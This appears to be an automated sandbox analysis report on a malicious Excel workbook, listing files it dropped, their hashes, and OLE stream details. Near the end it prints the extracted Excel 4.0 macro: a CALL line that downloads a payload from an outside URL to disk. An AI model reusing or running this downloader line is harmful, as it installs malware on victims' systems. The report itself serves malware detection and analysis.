                        Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                        C:\Users\user\AppData\Local\Temp\Tar1D24.tmp
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):152533
                        Entropy (8bit):6.31602258454967
                        Encrypted:false
                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                        Malicious:false
                        Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                        C:\Users\user\AppData\Local\Temp\~DF3C5C2A9E584434E2.TMP
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):38745
                        Entropy (8bit):1.7124864447404684
                        Encrypted:false
                        SSDEEP:192:LyVvE9VVG57zNq1sRURZctyu0EAlUX3YTfHpKXztwW:LyVvE9VVyFq1sRUReyu0EBYTRfW
                        MD5:AF1649E79F2DAD4712457C1EC07AF322
                        SHA1:E280F164850070495A30DC06B40410DC8055565D
                        SHA-256:58B7D73ED3118B59AA41D501647179F7BD185E0DF28A73195BB728EB210DB02C
                        SHA-512:9EAC31FD7B8625B3AAC3A87CF098A26BC8EE6399F6C23C2F56EDC4A29B1F4BE800F3AE1B5CF5EA36A78984DEEC38B3C00C9C18517C9654888E2D52BDE50A188A
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... .........................................R.~.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\~DF97328D057695074B.TMP
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13205
                        Entropy (8bit):1.5001502520525762
                        Encrypted:false
                        SSDEEP:48:LyBGFyvWGsSkqIk6GgskPNoKNWLWNhYNWN8O8Po:LyZvPHImq
                        MD5:447962120CED332B80D4012BF5BB3E14
                        SHA1:2A21FB96C3B06BC67AAD0ED43BC8E0E56F5B9C14
                        SHA-256:F19DE88ADB911CE27D708E7BF0E5DB714C4AAAFDAD1C5784D416E5F344CE256D
                        SHA-512:4FED26277F2EF1641A0907B108DF15294FA0A23D474FA2BFF2749A2D561DECC9E110C745E38A30BF2513B791291E5E8535666F8A8C2E1E7C64292F189DD199B4
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... .......................................0.?.~.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\~DFFE6867554BD92C1A.TMP
                        Process:C:\Program Files\Internet Explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):29993
                        Entropy (8bit):1.9622412316642932
                        Encrypted:false
                        SSDEEP:96:LyOvH9SVZBRicPoZKBeSvSDqT/ubEV8UbErEP:LyOvH9SV/48oZKB7qM/1V8brEP
                        MD5:75243C38ECF6670BC33E7D19F2B9A219
                        SHA1:169C3B37EFFD387DE3D34A77E0B7CB3FCEEC8F70
                        SHA-256:2D208810AFCD145FA823E7911F7148B568FC4CD70E27CDE6C58A2F2EC23AD746
                        SHA-512:8FDBA30C858B83841615774F32993A553BF865B1BC073E1C3058A5899604E25250DC7CC28E1A6BCC4ED2F61C2DD95B567BD74C96B8EFD2AECC4EEF355233BCC6
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ...........................................~.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Dec 23 21:48:42 2020, atime=Wed Dec 23 21:48:42 2020, length=12288, window=hide
                        Category:dropped
                        Size (bytes):867
                        Entropy (8bit):4.4704604740780605
                        Encrypted:false
                        SSDEEP:12:85QxY8LgXg/XAlCPCHaXgzB8IB/0JX+WnicvbSGbDtZ3YilMMEpxRljKLPTdJP9O:85kYq/XTwz6I0YemqDv3qmrrNru/
                        MD5:B58F98A31732CC1BD9B9A04B7E8164E5
                        SHA1:55BE8012AF57E1B0E6EE7FBA6F31CE3A6C3CB9E6
                        SHA-256:7788A07B21B076D8FFBA1BF0E179A8610F8D5B5FF5143610AE6CF0B0D156D7E6
                        SHA-512:E76281E19C1AEEB49D0B1046BCB6AC3E83E8CF1657AF25ACCC8F25E6713716084290C17C35EBF4CEAF67BCBA1D086C7E3447A362C3A728D2C770DC3B05D8523B
                        Malicious:false
                        Preview: L..................F...........7G......}.......}....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q....Desktop.d......QK.X.Q..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\549163\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......549163..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\OCC-221220-TBU1XAT7X4.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Dec 23 21:48:42 2020, atime=Wed Dec 23 21:48:42 2020, length=325120, window=hide
                        Category:dropped
                        Size (bytes):2138
                        Entropy (8bit):4.512074484841618
                        Encrypted:false
                        SSDEEP:48:8iYw/XT3Inxh/xhYAuQh2iYw/XT3Inxh/xhYAuQ/:87w/XLInz/YAuQh27w/XLInz/YAuQ/
                        MD5:23D19F6FA7C89B898BBAB87207A95D01
                        SHA1:E80AE445E43F9CA316E6843188FFA3A64E90A186
                        SHA-256:93270241517014DFC7889FE9FADE272A9545E0DCC7DE00A3FF2FECF6B5D48E67
                        SHA-512:A4CD2ED8B0EF856DF45D559A4F895D55A1964110966FB68E34A65F2EFDE9D8C688146779A1A646DD0391C23893A5F5C8417D9F96E1BEADD353C4A8AC412BF755
                        Malicious:false
                        Preview: L..................F.... ......{.....}.......}................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2......Q.. .OCC-22~1.XLS..`.......Q.y.Q.y*...8.....................O.C.C.-.2.2.1.2.2.0.-.T.B.U.1.X.A.T.7.X.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\549163\Users.user\Desktop\OCC-221220-TBU1XAT7X4.xls.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.C.C.-.2.2.1.2.2.0.-.T.B.U.1.X.A.T.7.X.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......549163.........
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):116
                        Entropy (8bit):4.681052788157828
                        Encrypted:false
                        SSDEEP:3:oyBVomM1/HUCmS9oy6UCmS9omM1/HUCmS9ov:dj6aCb9RCb96aCb9y
                        MD5:115E1D4A33F21DC9D6727BAEA9A373C7
                        SHA1:0EA691AB8173AE05568218CEF134EB9E975DC73F
                        SHA-256:48AE41E3911C1146D03BE39B092136640267D3521F401F3F67B097D0E93FFD43
                        SHA-512:9517ACB40EF1FB44640B2DABA874F44BE1E3779746A52FF0BE6764A12D4B04479CAC844716228C5C6554EF35F69FDE47C79A6613652D11AC754CDC3E024D85BD
                        Malicious:false
                        Preview: Desktop.LNK=0..[xls]..OCC-221220-TBU1XAT7X4.LNK=0..OCC-221220-TBU1XAT7X4.LNK=0..[xls]..OCC-221220-TBU1XAT7X4.LNK=0..
                        C:\Users\user\Desktop\CDDE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Applesoft BASIC program data, first line number 16
                        Category:dropped
                        Size (bytes):376641
                        Entropy (8bit):7.29426796389422
                        Encrypted:false
                        SSDEEP:6144:L8rmjAItyzElBIL6lECbgBvP5N+PnFAF3CcrF0rAoRqy0VUtl+IVbeusvZh3cEP/:yirvRHcIB237a/7pYFN
                        MD5:8460536D38C5B65D12A5845D5A5CF625
                        SHA1:77CEB384E8B3FAE310C1615115935A4BEA2FB9BF
                        SHA-256:91D36C9DD924EC0A25D50F3F47DF71D8F10142998C84D3B01FBF9F43F75CBF70
                        SHA-512:4BC761610E55791201ED126AA6CD48F8385332E37733CA8036FDE64FB9BE1A3CB28CA2A6BC7BE6B228AECD2428F26C56A94A9580F9B30207BFBC909842A45454
                        Malicious:false
                        Preview: ........g2.........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............
                        C:\Users\user\cnvmb.rty
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):238592
                        Entropy (8bit):6.175489362185205
                        Encrypted:false
                        SSDEEP:6144:bzLqexzY3mXAJ3WhC6aBpF7lZUPp0lts1BPz+A/OKwVdJ:bzLqmzDAEhCpTdS0Ls/UndJ
                        MD5:68CF96F4BC91628E22E1526D9728990B
                        SHA1:A1E1063EC8C3667E86E1AFAB81CB6BBEA84485B3
                        SHA-256:790191B70550856B3E8EC108FDB82CD8D852822D6716EC865F21CFB5AD160B7C
                        SHA-512:CA6BB734DF8BF35A2F3346FF5AD954ECC058A719B0EABF90D8C323B80ED6B8659CEF5B5F51F65B149C48435BC396920549A72471B0CDE1D70A02BF59DBF37B24
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 8%
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D...%...%...%..:...%..n9...%..:...%...]X..%......%...%..%...]O..%...]Y..%...w_..%...]Z..%..Rich.%..........................PE..L...YL.[...........!......... ..........................................................................................K...d...d.......`.......................H.......................................................X............................text...$........................... ..`.rdata..[...........................@..@.data...............................@....rsrc...`...........................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: Evrey, Last Saved By: Evrey, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 22 14:34:09 2020, Security: 0
                        Entropy (8bit):7.664500086424686
                        TrID:
                        • Microsoft Excel sheet (30009/1) 78.94%
                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                        File name:OCC-221220-TBU1XAT7X4.xls
                        File size:323584
                        MD5:c4356a3b949b77bce8be5ecf2def64db
                        SHA1:e5de9340e03e98e6e0b8f6630cfd40295a6c9881
                        SHA256:7389677e946cac4226da9b84eca90b94b59d46cf2bf4541ea58d96d39e6669d5
                        SHA512:1f059fcdbfa06124e6619e29c1015d7dd8dae5b4724a82cac60fdb51b32367b7c7b990248eef8cf6b6638307f018d9c22ccf984b353e8ef92d7d65a22a147340
                        SSDEEP:6144:z6FIpOCHAx+XHm9sLyaDIJ/fzGM8YZCkBFqrF0rKoRqy0VUtl+IVgeusvZhIcEPs:DirNRHcIS2I7a/7pY
                        File Content Preview:........................>...................................k...................b.......d......................................................................................................................................................................

                        File Icon

                        Icon Hash:e4eea286a4b4bcb4

                        Static OLE Info

                        General

                        Document Type:OLE
                        Number of OLE Files:1

                        OLE File "OCC-221220-TBU1XAT7X4.xls"

                        Indicators

                        Has Summary Info:True
                        Application Name:Microsoft Excel
                        Encrypted Document:False
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:True
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:
                        Flash Objects Count:
                        Contains VBA Macros:True

                        Summary

                        Code Page:1251
                        Author:Evrey
                        Last Saved By:Evrey
                        Create Time:2006-09-16 00:00:00
                        Last Saved Time:2020-12-22 14:34:09
                        Creating Application:Microsoft Excel
                        Security:0

                        Document Summary

                        Document Code Page:1251
                        Thumbnail Scaling Desired:False
                        Contains Dirty Links:False
                        Shared Document:False
                        Changed Hyperlinks:False
                        Application Version:917504

                        Streams

                        Stream Path: \x1CompObj, File Type: data, Stream Size: 102
                        General
                        Stream Path:\x1CompObj
                        File Type:data
                        Stream Size:102
                        Entropy:4.1769286656
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1a 00 00 00 cb e8 f1 f2 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                        General
                        Stream Path:\x5DocumentSummaryInformation
                        File Type:data
                        Stream Size:276
                        Entropy:3.27191921951
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . F i l e s 2 . . . . . F i l e s 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a3 00 00 00 02 00 00 00 e3 04 00 00
                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                        General
                        Stream Path:\x5SummaryInformation
                        File Type:data
                        Stream Size:208
                        Entropy:3.4567800795
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E v r e y . . . . . . . . . . . E v r e y . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . F . . o . . . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 313288
                        General
                        Stream Path:Workbook
                        File Type:Applesoft BASIC program data, first line number 16
                        Stream Size:313288
                        Entropy:7.72881127079
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . E v r e y B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . . . . . . .
                        Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 45 76 72 65 79 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                        Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 318
                        General
                        Stream Path:_VBA_PROJECT_CUR/PROJECT
                        File Type:ISO-8859 text, with CRLF line terminators
                        Stream Size:318
                        Entropy:5.19717474679
                        Base64 Encoded:True
                        Data ASCII:I D = " { 8 4 2 D D B 4 D - 3 3 A 9 - 4 6 1 5 - B 4 3 0 - 8 0 1 4 5 0 3 8 A B C 2 } " . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 C 3 E 9 6 1 C 7 E 1 4 8 2 1 4 8 2 1 4 8 2 1 4 8 2 " . . D P B = " 3 0 3 2 9 A D D 9 B D D 9 B D D " . . G C = " 2 4 2 6 8 E 2 4 7 6 1 9 7 7 1 9 7 7 E 6 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0
                        Data Raw:49 44 3d 22 7b 38 34 32 44 44 42 34 44 2d 33 33 41 39 2d 34 36 31 35 2d 42 34 33 30 2d 38 30 31 34 35 30 33 38 41 42 43 32 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 32 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33
                        Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 20
                        General
                        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                        File Type:data
                        Stream Size:20
                        Entropy:3.04643934467
                        Base64 Encoded:False
                        Data ASCII:. . . . 2 . . . 8 . A . B . 2 . . . . .
                        Data Raw:cb e8 f1 f2 32 00 1b 04 38 04 41 04 42 04 32 00 00 00 00 00
                        Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2189
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                        File Type:data
                        Stream Size:2189
                        Entropy:3.82478099668
                        Base64 Encoded:False
                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                        Data Raw:cc 61 97 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                        Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 459
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/dir
                        File Type:data
                        Stream Size:459
                        Entropy:6.2273797127
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . " . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                        Data Raw:01 c7 b1 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 22 0c d2 61 0f 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                        Stream Path: _VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 976
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10902
                        File Type:data
                        Stream Size:976
                        Entropy:3.21935521495
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d4 70 fd ea 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                        Macro 4.0 Code

                        CALL(Files2!CN87, Files2!CN96&Files2!CN97, Files2!CI96&Files2!CJ96, 0, http://companieshouseonlinedownload.com/ox9.png, Files2!CM97, 0, 0)
                        
